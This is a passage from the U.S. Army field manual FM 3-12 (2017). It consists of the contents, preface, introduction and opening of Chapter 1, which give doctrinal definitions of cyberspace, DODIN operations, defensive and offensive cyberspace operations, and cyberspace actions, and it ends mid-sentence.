 INTRODUCTION  ................................ ................................ ................................ ..........  v 
Chapter 1  CYBERSPACE AND ELECTRONIC WARFARE OPERATIONS 
FUNDAMENTALS  ................................ ................................ ................................ ..... 1-1 
Section I – Overview of  Cyberspace and the Electromagnetic Spectrum  .........  1-2 
The Cyberspace Domain  ................................ ................................ ...........................  1-2 
Operations and the Cyberspace Domain  ................................ ................................ .. 1-4 
Cyberspace Missions and Actions  ................................ ................................ ............  1-6 
Section II – Understanding Cyberspace and Environments  .............................  1-12 
Cyberspace and the Electromag netic Spectrum  ................................ .....................  1-12 
Cyberspace and the Information Environment  ................................ ........................  1-12 
Cyberspace Layers  ................................ ................................ ................................ .. 1-13 
The Characteristics of Cyberspace  ................................ ................................ .........  1-15 
Cyberspace as a Component of the Operational Environment  ...............................  1-16 
Risk in Cyberspace  ................................ ................................ ................................ .. 1-19 
Authorities  ................................ ................................ ................................ ................  1-21 
Section III – Electronic Warfare Operations ................................ ........................  1-25 
Electromagnetic Spectrum Operations  ................................ ................................ .... 1-25 
Electronic Warfare  ................................ ................................ ................................ ... 1-25 
Employment Considerations  ................................ ................................ ...................  1-31 
Spectrum Management  ................................ ................................ ...........................  1-34 
Chapter 2  RELATIONSHIPS WITH CYBERSPACE OPERATIONS AND ELECTRONIC 
WARFARE  ................................ ................................ ................................ ................  2-1 
Interdependencies  ................................ ................................ ................................ ..... 2-1 
Information Operations  ................................ ................................ ..............................  2-1 
Intelligence  ................................ ................................ ................................ ................  2-2 
Space Operations  ................................ ................................ ................................ ...... 2-3 
Targeting ................................ ................................ ................................ ....................  2-4 
Contents 
ii FM 3-12  11 April 2017 Chapter 3 CYBERSPACE ELECTROMAGNETIC ACTIVITIES WITHIN OPERATIONS ........ 3-1 
Fundamentals ........................................................................................................... 3-1 
Considerations .......................................................................................................... 3-1 
Commander’s Role  ................................................................................................... 3-2 
Enabling Resources .................................................................................................. 3-3 
Planning and Cyberspace Electromagnetic Activities ............................................. 3-13 
Cyber Effects Request Format and Targeting Activities ......................................... 3-21 
Appendix A INTEGRATION WITH UNIFIED ACTION PARTNERS ............................................ A-1 
Appendix B CYBERSPACE IN OPERATIONS ORDERS ...........................................................  B-1 
Appendix 12 (CyberSPACE Electromagnetic Activities) to Annex C (Operations) to 
Operations Plans and Orders ...................................................................................  B-2 
Appendix C CYBER EFFECTS REQUEST FORMAT ................................................................ . C-1 
Appendix D ELECTRONIC ATTACK REQUEST FORMAT ........................................................  D-1 
GLOSSARY ................................................................................................ . Glossary- 1 
REFERENCES .........................................................................................  References- 1 
INDEX ................................................................................................................  Index- 1 
Contents   
11 April 2017  FM 3 -12 iii Figures  
Figure Introduction -1. Cyberspace electromagnetic activities operational framework  ......................  vi 
Figure 1 -1. Visualization of cyberspace and the electromagnetic spectrum in an operational 
environment  ................................ ................................ ................................ ................  1-3 
Figure 1 -2. Freedom of maneuver to support joint force commander objectives  ..........................  1-5 
Figure 1 -3. Cyberspace and electronic warfare operations - missions and a ctions  ......................  1-6 
Figure 1 -4. Cyberspace actions  ................................ ................................ ................................ ..... 1-9 
Figure 1 -5. The electromagnetic spectrum  ................................ ................................ ..................  1-12 
Figure 1 -6. Cyber -persona relationship to the physical and logical layers  ................................ .. 1-14 
Figure 1-7. Operational area with network topology information  ................................ .................  1-17 
Figure 1 -8. Electromagnetic spectrum operations  ................................ ................................ ....... 1-25 
Figure 1 -9. Electronic warfare missions  ................................ ................................ .......................  1-26 
Figure 3 -1. Cyberspace electromagnetic activities coordination and synchr onization  ..................  3-6 
Figure 3 -2. Cyberspace electromagnetic activities working group organization  ..........................  3-11 
Figure B -1. Appendix 12 -cyberspace electromagnetic activities  ................................ ................... B-3 
Figure C -1. Cyber effects request format routing for cyberspace operations  ...............................  C-2 
Figure C -2. Cyber effects request format  ................................ ................................ ......................  C-4 
 
Table s 
Table 1 -1. Sample cyberspace and electronic warfare threat capabilities  ................................ ... 1-21 
Table 1 -2. United States Code -based authorities  ................................ ................................ ........  1-24 
Table 3 -1. Tasks of the cyberspace electromagnetic activities working group  ............................  3-12 
Table 3 -2. The military decision -making process, step 1: receipt of mission  ...............................  3-15 
Table 3 -3. The military decision -making process, step 2: mission analysis ................................ . 3-16 
Table 3 -4. The military decision -making process, step 3: course of action development  ............  3-17 
Table 3 -5. The military decision -making process, step 4: course of action analysis  ...................  3-18 
Table 3 -6. The military decision -making process, step 5: course of action comparison  ..............  3-19 
Table 3 -7. The military decision -making process, step 6: course of action approval  ..................  3-20 
Table 3 -8. The military decision -making process, step 7: orders production, dissemination, and 
transition  ................................ ................................ ................................ ...................  3-21 
Table 3 -9. Examples of simultaneous and complimentary effects  ................................ ...............  3-23 
Table D -1. The electronic attack request format  ................................ ................................ ...........  D-1 
Table D -2. The electronic attack 5 -line briefing  ................................ ................................ .............  D-2 
 
iv FM 3-12  11 April 2017 Preface 
FM 3- 12 provides tactics and procedures for the coordination and integration of Army cyberspace and electronic 
warfare operations to support unified land operations and joint operations. FM 3-12 explains Army cyberspace 
and electronic warfare operations fundamentals, terms, and definitions. This publication provides overarching 
guidance to commanders and staffs on Army cyberspace and electronic warfare operations at all echelons. 
The principal audience for FM 3-12 is all members of the profession of arms. Commanders and staffs of Army 
headquarters serving as joint task force or multinational headquarters should also refer to applicable joint or 
multinational doctrine concerning the range of military operations and joint or multinational forces. Trainers and 
educators throughout the Army will also use this publication. 
Commanders, staffs, and subordinates ensure their decisions and actions comply with applicable United States, 
international, and in some cases host-nation laws and regulations. Commanders at all levels ensure their Soldiers 
operate according to the law of war and the rules of engagement. (See FM 27- 10.) 
FM 3-12 uses joint terms where applicable. Selected joint and Army terms and definitions appear in both the 
glossary and the text. Terms for which FM 3-12 is the proponent publication (the authority) are marked with an 
asterisk (*) in the glossary. Terms and definitions for which FM 3-12 is the proponent publication are boldfaced 
in the text. For other definitions shown in the text, the term is italicized and the number of the proponent 
publication follows the definition. 
FM 3-12 applies to the Active Army, Army National Guard/Army National Guard of the United States, and United 
States Army Reserve unless otherwise stated. 
The proponent of FM 3-12 is the United States Army Cyber Center of Excellence. The preparing agency is the 
Cyber Center of Excellence Doctrine Division, United States Army Cyber Center of Excellence. Send comments 
and recommendations on a DA Form 2028 (Recommended Changes to Publications and Blank Forms) to 
Commander, U.S. Army Cyber Center of Excellence and Fort Gordon, ATTN: ATZH- ID (FM 3-12), 506 
Chamberlain Avenue, Fort Gordon, GA 30905-5735; by E-mail to usarmy.gordon.cyber-coe.mbx.gord- fg-
doctrine@mail.mil. 
 
11 April 2017  FM 3 -12 v Introduction  
FM 3 -12 provides overarching doctrinal guidance and direction to the Army for conducting cyberspace  and 
electroni c warfare ( EW) operations using  cyberspace electromagnetic activities ( CEMA ) in unified land 
operations. FM 3 -12 defines and provides an understanding of Army cyberspace operations, EW, title authorities, 
roles, relationships, responsibilities, and capabil ities to support  Army and joint operations. It expands upon the 
methods by which Army forces approach the defense of Army networks and data and addresses the opportunities 
commanders have to integrate tailored cyberspace and EW capabilities across the rang e of military operations.  
FM 3 -12 nests with and supports joint cyberspace and EW operations doctrine and ADRP 3 -0, Operations, and 
provides the doctrinal context to address the relationship among ADRP 5 -0, The Operations Process, and 
cyberspace and EW ope rations. To understand the fundamentals of integrating and synchronizing cyberspace and 
EW operations, ADP 2 -0, ADRP 2 -0, ADP 3 -0, ADRP 3 -0, ADP 5 -0, ADRP 5 -0, ADP 6 -0, ADRP 6 -0, ATP 2-
01.3, FM 3 -13, and FM 6 -0 must first be read. CEMA, by planning , integr ating,  and synchronizing cyberspace 
and EW operations, integrates functions and capabilities across warfighting functions, defends the network, and 
provides critical capabilities for commanders at all levels during unified land operations. Cyberspace and E W 
operations affect, and are affected by, all of the warfighting functions.  
This FM provides detail on tactics and procedures for Army cyberspace and EW operations.  This FM supersedes 
FM 3 -38, dated February 2014. FM 3 -12 is the proponent for Army cyberspa ce and EW operations. This FM 
includes the fundamentals and guiding principles for cyberspace operations, EW, and CEMA in one publication. 
It provides a cohesive and coherent description  of how they support and enable operations as well as other mission 
tasks and functions at each echelon. This FM sets the basis for the subordinate Army technique s publications.  
Cyberspace and EW operations are integrated into operations using  already established joint  and Army processes 
such as the intelligence process, targeting, and the military decision -making process  (MDMP) . This FM explains 
the fundamental ideas of Army cyberspace and EW  operations . This includes the  staff responsibilities, 
contributions to the MDMP , targeting in cyberspace and the EMS, the reliance on intelligence and operational 
preparation of the environment ( OPE)  in cyberspace.  
This FM describes the cyberspace operations, missions, actions, EW, the electromagnetic spectrum ( EMS ), and 
the interrela tion of these activities among each other and all Army operations. The description includes CEMA 
as the planning, integrating and synchronizing  activity for echelons corps and below . 
Chapter 1 provides an understanding of cyberspace, cyberspace operations,  missions, actions, and effects. It 
describes cyberspace and situational understand ing and awareness, threats, risks, vulnerabilities and its 
relationship with the information and operational environment. The chapter describes the layers and 
characteristic s of cyberspace  and i dentifie s the legal authorities that apply to cyberspace and cyberspace 
operations. Chapter 1 includes the fundamental information of EW  and spectrum management functions as they 
relate to cyberspace and EW operations . 
Chapter 2 provid es information on operations and missions that use cyberspace for more than daily business. 
Information operations, intelligence, space operations, and targeting  may affect cyberspace, the EMS, cyberspace 
operations, and EW operations. Commanders and staff s integrate and synchronize cyberspace and EW operations 
with these during all phases of operations.  
Chapter 3 describes Army CEMA and mission command, the commanders’ role, cyberspace and EW operations 
with the warfighting functions , and the commanders’ resources that have effects on, in , and through cyberspace 
and the EMS. This chapter discusses how cyberspace and EW operations planning factors into the operations 
process . This includes  planning, preparing, executing, assessing , and  targeting. The discussion of the operational 
environment is combined with the MDMP followed by an overview of preparation requirements, execution 
tactics, and how to assess cyberspace and EW operations.  
Appendix A discusses cyberspace operations and the va rious unified action partners.  
Introduction 
vi FM 3-12  11 April 2017 Appendix B highlights the location of cyberspace operations information in operations orders and appendix 12 to 
Annex C. This appendix includes an example of Appendix 12 to Annex C with a description of the types of 
information included in this appendix and various sections. 
Appendix C includes procedures for processing cyberspace effects requests at echelons corps and below, echelons 
above corps, and the cyber effects request format (CERF) fields and information. A blank copy of the CERF and 
an explanation of the fields are part of the procedures. 
Appendix D includes the electronic attack request format (EARF) fields and information. A blank copy of the 
EARF and 5-line briefing with an explanation of the fields are part of the procedures. 
Figure Introduction-1. Cyberspace electromagnetic activities operational framework 

 
11 April 2017  FM 3 -12 1-1 Chapter 1   
Cyberspace and Electronic Warfare Operations 
Fundamentals  
This chapter introduces cyberspace and electronic warfare  operations . Section one is 
an overview of  cyberspace and the electromagnetic spectrum. Section two delivers  a 
foundation for understanding cyberspace and environments . Section three describes 
electronic warfare  operations.  
1-1. Superiority  in cyberspace and the electroma gnetic spectrum ( EMS ) provides a decisive advantage to 
commanders at all levels in modern combat . The Army ’s ability  to exploit cyberspace and EW capabilities 
will prove critical to  the success of unified land operations.  As cyberspace and EW operations develop similar 
and complementary capabilities, th e Army  must  plan, integrate, and synchronize these operations with 
unified land operations.  
1-2. Employing cyberspace and EW capabilities under a single  planning, integration, and synchronization  
methodology inc reases the operational commander ’s ability  to understand the environment, project power , 
and synchronize multiple operations using the same domain and environment . Synchroniz ing offensive and 
defensive activities  allows a faster  respon se to enemy and adver sary actions. The EMS is the common 
denominator for both cyberspace and EW operations, and also impacts every operation  in the Army.  
1-3. The distinctions between cyberspace and EW capabilities allow for each to operate separately and 
support operations distinc tly. However, this also necessitates synchronizing efforts  to avoid unintended 
interference . Any operational requirement specific to electronic transfer of information through the wired 
portion of cyberspace  must use a cyberspace  capability for affect. If the portion of cyberspace uses only  the 
EMS  as a transport method , then it is an EW capability that can affect it . Any operational requirement to 
affect  an EMS  capability not  connect ed to cyberspace must use an EW capability.   
1-4. The Department of Defense inf ormation network -Army ( DODIN -A) is the Army's critical warfighting 
platform , which enables mission command, precision fires, intelligence, logistics, and tele-medicine , and 
supports all operations.  (See paragraph 1 -25 for additional informa tion on DODIN -A.) Access to the DODIN -
A allows commanders to project combat power, conduct support operations, and achieve joint and Army 
force commander objectives. Securing and operating  this expansive network is one of the most complex and 
important operation s the Army currently undertakes. A single vulnerability within this network can place 
units and operations at risk, potentially resulting in mission failure. Understanding how to operationalize 
cyberspace and the EMS is a fundamental staff profici ency and commander's priority.  
1-5. Superiority in cyberspace and the EMS to support  Army operations results from  effectively 
synchronizing Department of Defense information network  (DODIN ) operations, off ensive cyberspace 
operations (OCO), defensive cyberspace operations (DCO), electronic attack, electronic protection, 
electronic warfare support , and spectrum management operations (SMO). Cyberspace electromagnetic 
activities  is the process of planning, int egrating, and synchronizing cyberspace and electronic warfare 
operations in support of unified land operations  (ADRP 3 -0). Through CEMA , the Army plans, integrates, 
and synchronizes these missions , supports and enables the mission command system, and provi des an 
interrelated capability for information and intelligence operations.  
1-6. Cyberspace and the EMS will likely grow  increasingly congested, contested,  and critical  to successful 
unified land operations . Success will be measured by the ability to execute operations freely in cyberspace 
and the EMS, while control ling the ability of others to operate in the domain.  
1-7. Rapid developments i n cyberspace and the EMS will challenge any assumptions of the Army’s 
advantage  in this domain . While it cannot defend against every kind of intrusion, the Army  must take steps 
to identify, prioritize, and defend its most important networks and data. Commanders and cyberspace 
Chapter 1 
1-2 FM 3-12  11 April 2017 operations experts must also adapt quickly and effectively to enemy and adversary presence inside 
cyberspace systems.  
1-8. Protecting the DODIN and friendly EMS includes controlling communication signatures in the EMS. 
There is a correlation to activities in cyberspace and those in the EMS. Current communications systems 
transfer data in the EMS as one of the transport methods, leaving signatures of activities. Identifying, 
attributing, and affecting the activity (in or through cyberspace or the EMS) can have detrimental effects on 
the operations of the entity attempting to communicate. Commanders stand to gain an advantage over an 
enemy or adversary by maintaining superiority in cyberspace and the EMS , whereas the reverse can threaten 
friendly systems if the proper security, defense, and protection measures are not in place.  
SECTION I – OVERVIEW OF CYBERSPACE AND  THE ELECTROMAGNETIC 
SPECTRUM  
1-9. Section 1 is an overview of cyberspace including the cyberspace domain, operations, missions, and 
actions, covering effects in cyberspace and the difference between joint and Army effects terminology . This 
section includes information about the EMS and SMO. 
THE CYBERSPACE DOMAI N 
1-10. Cyberspace  is a global domain within the information environment consisting of the interdependent 
networks of information technology infrastructures and resident data, including the Internet, 
telecommunications networks, computer systems, and embedded processors and controllers (JP 3-12[R]). 
The Army performs cyberspace operations and supporting activities within this domain as part of joint and 
Army operations. Friendly, enemy, adversary, and host nation networks, communications systems, 
computers, cellular phone systems, social media W eb sites, and technical infrastructures are all part of 
cyberspace. Cyberspace operations  are the employment of cyberspace capabilities where the primary 
purpose is to achieve objectives in or through cyberspace (JP 3-0). The interrelated cyberspace missions are 
DODIN operations, DCO, and OCO. A cyberspace capability is a device, computer program, or technique, 
including any combination of software, firmware, or hardware, designed to create an effect in or through 
cyberspace. (See JP 3- 12[R] for more information.) Figure 1- 1 on page 1- 3 is a visual representation of 
cyberspace and use of the EMS in an operational environment. 
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-3 Figure 1 -1. Visualization of cyberspace and the electromagnetic spectrum  in an operational 
environment  
1-11. Cyberspace and the EMS are essential for Army operations and are inherently joint, inter -
organizational, multinational , and commercial. All Army operations, missions, activities, and functions use 
cyberspace. Cyberspace superiority  is the degree of dominance in cyberspace by one force that permits the 
secure, reliab le conduct of operations by that force, and its related land, air, maritime, and space forces at a 
given time and place without prohibitive interference by an enemy or adversary (JP 3 -12[R]) . Cyberspace 
superiority enables, supports, provides, and facilitates warfighting capabilities that affect, support, and enable 
every warfighting function and daily activity.  
Note . For clarity, the Army reserves the use of the term ‘cyber ’ for the naming convention of 
commands and organizations. For the Army, the  full term ‘cyberspace ’ is correct to explain the 
domain, activities, effects, actions and when referring to capabilities in the cyberspace domain. 
The Army uses Department of Defense (DOD) established terms that may not follow this 
principle.  

Chapter 1  
1-4 FM 3 -12 11 April 2017  1-12. Although c yberspace  coexists with  the other domains , it is a separate domain . Cyberspace pervades 
the land, air, maritime, and space domains through the EMS and wired networks. Cyberspace enables 
integration across physical domains by moving data along transmission paths through links and nodes in 
cyberspace and the EMS. The man -made aspects of cyberspace, coupled with continual advances in 
technologies, contribute to a continuous obligation to manage risk and protect portions of cyberspace.  (For 
more information on the EMS and its management, see section two.)  
1-13. Cyberspace enables and enhances the ability of commanders to perform mission command. The 
DODIN is the DOD’s portion of cyberspace and is distinct  in that it provides the medium for communication 
among the forces within other operational domains. The Department of Defense information network   is the 
set of information capabilities , and associated processes to collect, process, store, disseminate, and manage 
information on demand to warfighters, policy makers, and support personnel, whether interconnected or 
stand -alone, including owned and leased communications and computing system s and services, software 
(including applications), data, security services, other associated services, and national security systems (JP 
6-0). The DODIN includes all DOD information technologies broadly grouped as DOD information systems, 
platform informat ion technology, information technology services, and information technology products.  
1-14. The Army uses the cyberspace domain every day to communicate, store data, plan missions, and 
perform tasks. In today’s dynamic  operational environment, the exercise of m ission command depends  on 
freedom of maneuver within the cyberspace domain . 
OPERATIONS AND THE C YBERSPACE DOMAIN  
1-15. Army operations depend on cyberspace for synchronizing, storing, coordinating , and protecting 
information. Commanders rely on cyberspace to exe rcise mission command. In the 2014 Army's Strategic 
Planning guidance, the Secretary of the Army and Army Chief of Staff jointly stated:  
“Similar to other domains, Army leaders and organizations must be capable of employing 
capabilities in cyberspace, but not to the point of dependency should those capabilities be 
negated. This convergence between land and cyberspace has created dependencies and 
vulnerabilities for the Army's ability to exercise mission command through the Army 
network. The Army will priori tize the defense of its network and key systems against 
increasingly sophisticated and evolving threats in order to retain freedom of maneuver and 
exploit its advantages. As the Army addresses these challenges, it will build cyberspace 
capabilities that ar e integrated within a [j]oint construct, but also include integration with 
Army units down to the tactical edge. Finally, when authorized, the Army must be prepared 
to plan and conduct cyberspace operations in support of  national, joint, and Service 
requir ements.”  
1-16. Freedom of maneuver  in cyberspace enables mission command and freedom of maneuver in the other 
domains. By enabling mission command and the freedom of maneuver, Army operations support the joint 
force commander  (JFC)  objectives. (See figure 1 -2 on page 1 -5.) 
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-5 Figure 1 -2. Freedom of maneuver  to support joint force commander  objectives  
JOINT OPERATIONS AND T HE CYBERSPACE DOMAIN  
1-17. The DODIN supports the end -to-end communications systems for joint command and control of 
military operations and the joi nt communications use of the cyberspace domain. The DODIN  represents the 
DOD portion of cyberspace and includes joint and Service data communications as well as interfaces to non -
DOD and multinational users.  
1-18. Joint cyberspace operations suppor t and enable operations for joint and Service specific organizations. 
Joint commanders and staffs conduct operations in and through cyberspace to assure U.S. and allied forces 
freedom of maneuver in all domains to include  cyberspace while denying enemies a nd adversaries the same. 
Joint commanders use existing theater communications systems that provide theater -wide voice, data, and 
message connectivity between all components and elements to coordinate activities. Combatant commands 
establish and manage the theater systems and receive additional capabilities based on operational need.  
ARMY OPERATIONS AND T HE CYBERSPACE DOMAIN  
1-19. Army cyberspace  operations range from defensive to offensive . These operations  establish and 
maintain secure co mmunications, detect and deter threats in cyberspace to the DODIN, analyze incidents 
when they occur, react to incidents, and then recover and adapt while supporting Army and joint forces from 
strategic to tactical levels while simultaneously denying adver saries effective use of cyberspace and the EMS. 
The Army contribution to the DODIN is the technical network that encompass es the Army information 
management systems and information systems that collect, process, store, display, disseminate, and protect 
information worldwide. Army cyberspace operations provide support to, and receive support from, joint 
cyberspace operations. The close coordination and mutual support with joint cyberspace operations provides  
Army commanders and staffs enhanced capabilities f or operations.  
1-20. The Army plans, integrates , and synchronizes cyberspace operations through CEMA  as a continual 
and unified effort. The continuous planning, integration, and synchronization of cyberspace and EW 
operations, enabled by SMO , can produce singular, reinforcing, and complementary effects. Though the 
employment of cyberspace operations and EW differ  because cyberspace operates on wired networks , both 
operate  using  the EMS . 

Chapter 1  
1-6 FM 3 -12 11 April 2017  CYBERSPACE MISSIONS AND ACTIONS  
1-21. Cyberspace missions  and actions are interrelated ; synchronizing and supporting efforts among the 
cyberspace missions  is imperative to maintaining freedom of maneuver  in cyberspace. Supporting the 
cyberspace missions are the cyberspace actions : cyberspace defense; cyberspace intelligence, surveillance , 
and reconnaissance ( ISR); cyberspace OPE; cyberspace attack; and cyber space security. Cyberspace actions 
support DODIN operations, DCO, OCO, or any combination thereof. Executing c yberspace actions at any 
echelon is dependent on authority, capability, and coordination. The actions are interrelated and a cyberspace 
mission may require more than one action to achieve mission success.  
1-22. Army forces can execute cyberspace missions and act ions under the proper authority. Since DODIN 
operations and some DCO tasks may overlap, Army forces may conduct multiple cyberspace missions or 
actions as part of their daily duties and responsibilities. Situational requirements may dictate the transition 
from cyberspace security to DCO internal defensive measures (DCO -IDM) . Figure 1 -3 shows  the relationship 
of the cyberspace missions and cyberspace actions both external and internal to the DODIN and the owned, 
leased, shared partner portions of cyberspace.  EW can affect the cyberspace capabilities that use the EMS.  
Figure 1 -3. Cyberspace and electronic warfare operations  - missions and actions  
1-23. Use of the DODIN relies upon DODIN operations , DCO, and at times on OCO for freedom of 
maneuver  to employ a networ k capability. Cyber space security and DCO protect and defend Army networks, 
thereby maintaining communications and mission command. Current intrusion information may lead to 
future defensive cyberspace operations  response action (DCO -RA) or OCO missions. D CO and OCO 

Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-7 depends on the DODIN for planning, synchronization, and integration of missions. EW may also support and 
enable cyberspace operations through electronic attack (EA), electronic protection (EP), and electronic 
warfare support (ES).  
DEPARTMENT OF DEFENSE INFORMATION NETWORK OPERATIONS  
1-24. The DODIN  includes DOD information technology which cyberspace operations forces must secure 
and protect to ensure mission assurance for DOD components. The DODIN supports the synchronization and 
integration of all warfighting functions. Army forces use the DODIN to collaborate internally and externally , 
move and manage information , transmit and receive orders , and maintain situational awareness.  
1-25. The DODIN -A is an Army operated enclave  of the DODIN  which  encompasses all Army information 
capabilities that collect, process, store, display, disseminate, and protect information worldwide. The 
DODIN -A enables mission command and facilitates all warfighting and business functions. The DODI N-A 
seamlessly supports deployed forces and operations at bases, posts, camps, stations , and other locations 
worldwide including at the strategic, operational, and tactical levels.  
1-26. The DODIN -A enables access to the right information at the right place and  time for commanders, 
staffs, Soldiers, civilians, and joint, inter -organizational, and multinational elements. The DODIN -A allows 
access while at home station or a temporary duty location; through post, camp, or station networks; and 
through deployed tact ical networks. These segments allow operating and generating forces to access 
centralized resources from any location during all operational phases. Network support is available at the 
home post, camp, or station, throughout deployment and on redeployment to home  station. The network 
support may be organic depending on the organization and forces aligned to that organization.  
1-27. Department of Defense information network operations  are operations to design, build, configure, 
secure, operate, maintain, and sustain Department of Defense networks to create and preserve information 
assurance on the Department of Defense information network (JP 3 -12[R]). DODIN operations are threat 
agnostic and network specific to provide users and systems at all levels with end -to-end network and 
information system availability, information protection, and prompt information delivery. DODIN operations 
allow commanders to effectively commu nicate, collaborate, share, manage, and disseminate information 
using automated information systems. The Army conducts distributed DODIN operations within the DODIN -
A, from the global level to the tactical edge. DODIN operations personnel design, build, co nfigure, secure, 
operate, maintain, and sustain global, theater, and tactical portions of the DODIN -A. DODIN operations 
provide assured and timely network -enabled services to support DOD warfighting, intelligence, and business 
missions across strategic, op erational, and tactical boundaries. DODIN operations provide system and 
network availability, information protection  through  defensive tools  and procedures , and information 
delivery. (See FM 6 -02 for additional information on DODIN operations. )  
DEFENSIVE CYBERSPACE OPERATIONS  
1-28. Defensive cyberspace operations  are passive and active cyberspace operations intended to preserve the 
ability to utilize friendly cyberspace capabilities and protect data, networks, net -centric capabilities, and other 
designated systems (JP 3 -12[R]). DCO are threat -specific and mission prioritized to retain the ability to use 
the DODIN. The Army uses a defense -in-depth concept, incorporating a layered approach to defend the 
network.  
1-29. The two types of DCO are DCO -RA and DCO -IDM. Both are threat -specific and defend the DODIN, 
but the similarity ends with that purpose. DCO -RA is more aligned with OCO in execution, authorities, and 
techniques  supporting the mission. DCO -IDM include mission assuran ce actions .  
1-30. DCO respond to unauthorized activity , alerts, and threat information against the DODIN, and leverages 
intelligence, counterintelligence, law enforcement , and other military capabilities as required. DCO include 
outmaneuvering adversaries taking or about to take offensive actions against defended networks, or 
responding to internal and external cyberspace threats. DCO also include actively hunting for adva nced 
internal threats that evade routine security measures. DCO consist of those actions designed to protect 
friendly cyberspace from enemy and adversary actions.  
Chapter 1  
1-8 FM 3 -12 11 April 2017  1-31. DCO may be a response to attack s, exploitation s, intrusion s, or effects of malware on the DOD IN or 
other assets that the DOD is directed to defend. Most DCO occur  within the defended network. DOD DCO 
mission s are accomplished using a layered, adaptive, defense -in-depth approach, with mutually supporting 
elements of digital and physical protection.  A key characteristic of DOD DCO activities is active cyberspace 
defense.  
1-32. DCO activity may lead to follow on activities  such as additional cybersecurity measures , information 
collection,  or development of OCO targets. Reporting unauthorized network activit y and anomalies increases 
the data available to identify trends and to take appropriate defensive measures. The personnel confirming 
the unauthorized activity report the details for intelligence and forensic purposes.  
Defensive Cyberspace Operations Intern al Defensive Measures  
1-33. DCO -IDM  occur within the DODIN. DCO -IDM may involve reconnaissance measures within the 
DODIN to locate internal threats  and may respond to unauthorized activity, alerts, and threat information.  
Internal threat cueing may come from cybersecurity  tools employed on the network. DCO -IDM focus to 
dynamically reestablish, re -secure, reroute, reconstitute, or isolate degraded or compromised local networks 
to ens ure sufficient cyberspace access for JFC forces.  
1-34. Army forces employ various DCO -IDM to protect and defend the DODIN. Army units plan, integrate, 
and synchronize DCO -IDM to create and achieve actions by friendly forces against the enemy to support the 
comma nder's objectives as part of the operations process.  
Defensive Cyberspace Operations Response Action  
1-35. Defensive cyberspace operations  response action  is defined as deliberate, authorized defensi ve 
measures or activities taken outside of the defended network to protect and defend DOD cyberspace 
capabilities or other designated systems (JP 3 -12[R]) . Provocation that leads to employing DCO -RA includes 
indicators from the various sensors and capabili ties that detect and identify  indications of an imminent or 
ongoing cyberspace attacks. If approved, specially trained cyber mission forces employ actions to protect 
and defend friendly force cyberspace. Some adversary actions can trigger DCO -RA necessary to defend 
networks by creating effects outside of the DODIN, when authorized. Some of the specially trained personnel 
are Army forces operating as part of a joint force.  
1-36. DCO -RA require s the same type of information collection support as OCO for threat info rmation. 
DCO -RA may involve using nondestructive countermeasures that identify the source of the threat to the 
DODIN -A, and then use nonintrusive techniques to stop or mitigate that threat. Joint forces may provide 
DCO -RA support to Army commanders at corp s and below.  
Note . Countermeasures require deconfliction with other departments and agencies to the 
maximum extent practicable according to the Trilateral Memorandum of Agreement among the 
DOD, the Department of Justice, and the Intelligence Community Regarding Computer Network 
Attack and Computer Network Exploitation Activities, 9 May 2007.  
OFFENSIVE CYBERSPACE OPERATIONS  
1-37. Offensive cyberspace operations  are cyberspace operations intended to project power by t he 
application of force in or through cyberspace (JP 3 -12[R]) . The Army provides forces trained to perform 
OCO across the range of military operations in and through cyberspace providing effects outside of the 
DODIN.  Army forces conducting OCO do so under the authority of CCMDs and United States Cyber 
Command ( USCYBERCOM ). 
1-38. Forces conducting OCO missions  deconflict, coordinate, and synchronize OCO with other cyberspace 
operations, cyberspace activities, and other operations. Joint forces may provide OCO supp ort to corps and 
below Army commanders in response to requests using the CERF. OCO focus on targeting objectives in or 
through cyberspace  and related portions of the EMS . Army units plan, integrate, and synchronize OCO to 
create and achieve effects to supp ort the commander’s objectives  as part of the operations process. OCO 
targets may require extended planning time, extended approval time, synchronization and deconfliction.  The 
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-9 CERF provides  detailed  information on requested effects . (For more information on CERF procedures, see 
Appendix C.)  
CYBERSPACE ACTIONS  
1-39. The cyberspace missions require the employment of various actions to create specific effects in 
cyberspace . (See figure 1 -4.) The cyberspace actions are cyberspace defense, cyberspace ISR, cyberspace 
OPE, cyberspace attack, and cyber space security . To plan for, authorize, and assess these actions, it is 
important to understand the differences between the actions and their specific purposes. (For more 
information on the  cyberspace actions see JP 3 -12[R].) 
Figure 1 -4. Cyberspace actions  
Cyberspace Defense  
1-40. Cyberspace defense  are actions normally taken within the DOD cyberspace for securing, operating, 
and defending the DODIN  against specific threats . The purpose of cyberspace defense includes actions to 
protect, detect, characterize, counter, and mitigate  threats . Such defensive actions are usually created by the 
JFC or Service that owns or operates the network, except in cases where these defensive ac tions would affect 
the operations of networks outside the responsibility of the respective JFC or Service.  
Cyberspace Intelligence, Surveillance  & Reconnaissance  
1-41. Cyberspace ISR is an intelligence action conducted by the JFC authorized by an execute order or 
conducted by attached signals intelligence  (SIGINT)  units under temporary delegated SIGINT  operational 
tasking authority. Cyberspace ISR includes activities in cyberspace condu cted to gather intelligence required 
to support future OCO or DCO. These activities support planning and execution of current and future 
cyberspace operations.  Cyberspace ISR focuses on tactical and operational intelligence and on mapping 
enemy and adversa ry cyberspace to support military planning. Cyberspace ISR requires appropriate 
deconfliction  and authorization . Cyberspace forces are trained  and certified  to a common standard with the 
intelligence community. Cyberspace ISR is conducted pursuant to military authorities and must be 
coordinated and deconflicted with other United States Government departments and agencies. Army units 
conducting cyberspace ISR operate as part of a joint force or specially trained service retaine d forces 
supporting specific cyberspace operations missions.  

Chapter 1 
1-10 FM 3-12  11 April 2017 Cyberspace Operational Preparation of the Environment 
1-42. Cyberspace OPE consists of the non-intelligence enabling activities for the purpose of planning and 
preparing for ensuing military operations. Cyberspace OPE requires forces trained to a standard that prevents 
compromise of related intelligence collection operations. OPE in cyberspace is conducted pursuant to 
military authorities and must be coordinated and deconflicted with other United States Government 
departments and agencies. 
Cyberspace Attack 
1-43. Cyberspace attack  is a cyberspace action that creates various direct denial effects in cyberspace (for 
example, degradation, disruption, or destruction) and manipulation that leads to denial, that is hidden or that 
manifests in the physical domains (JP 3-12[R]). The purpose of cyberspace attack is the projection of power 
to provide an advantage in cyberspace or the physical domains for friendly forces. For example, a cyberspace 
attack may target information residing on, or in transit between, computers or mobile devices to deny enemy 
or hostile actors the ability to use resources. Cyberspace attack may be for offense or defense operations in 
